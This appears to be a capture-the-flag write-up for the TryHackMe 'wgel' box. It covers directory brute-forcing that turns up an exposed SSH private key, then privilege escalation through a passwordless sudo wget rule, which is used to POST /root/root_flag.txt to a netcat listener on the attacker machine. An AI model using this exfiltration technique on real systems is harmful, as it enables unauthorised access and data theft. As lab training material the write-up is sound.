Can you exfiltrate the root flag?

Dunno, but since this is a easy rated box I give myself a fighting chance. Let’s begin.


nmap says we’ve got 22 (SSH) and 80 (HTTP) only.


The homepage for the website is just the Apache default page, with one exception - a comment for Jessie. So perhaps that’s our username.

Gobuster is a place to start:

root@kali:/opt/tryhackme/wgel# gobuster dir -u -w /usr/share/wordlists/dirb/common.txt

This turns up one interesting directory - sitemap. Checking that we get a whole host of pages; basically an incomplete blog/business site. It’s called unapp, but that doesn’t turn up anything on searchsploit, so let’s gobuster in the sitemap directory:

root@kali:/opt/tryhackme/wgel# gobuster dir -u -w /usr/share/wordlists/dirb/common.txt

Doing that, we find .ssh/id_rsa. Bingo.


Once we’ve downloaded the ssh key, we can chmod 600 it and then login:

root@kali:/opt/tryhackme/wgel# ssh -i id_rsa jessie@

Then we run sudo -l:

jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget


Jessie has got the user flag, and we can run wget as root. What can we do with that? Well, the box hint was about exfiltrating the root flag.

GTFOBins says we can exfiltrate files:

Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use –post-data to send hard-coded data.

wget –post-file=$LFILE $URL

So let’s try that:

jessie@CorpOne:/$ URL=  
jessie@CorpOne:/$ LFILE=/root/root_flag.txt  
jessie@CorpOne:/$ sudo wget --post-file=$LFILE $URL  
--2020-08-07 07:02:51--  
Connecting to connected.  

And on the receiving end I used netcat:

root@kali:/opt/tryhackme/wgel# nc -nvlp 1234  
Ncat: Version 7.80 ( )  
Ncat: Listening on :::1234  
Ncat: Listening on  
Ncat: Connection from  
Ncat: Connection from  
POST / HTTP/1.1  
User-Agent: Wget/1.17.1 (linux-gnu)  
Accept: */*  
Accept-Encoding: identity  
Connection: Keep-Alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 33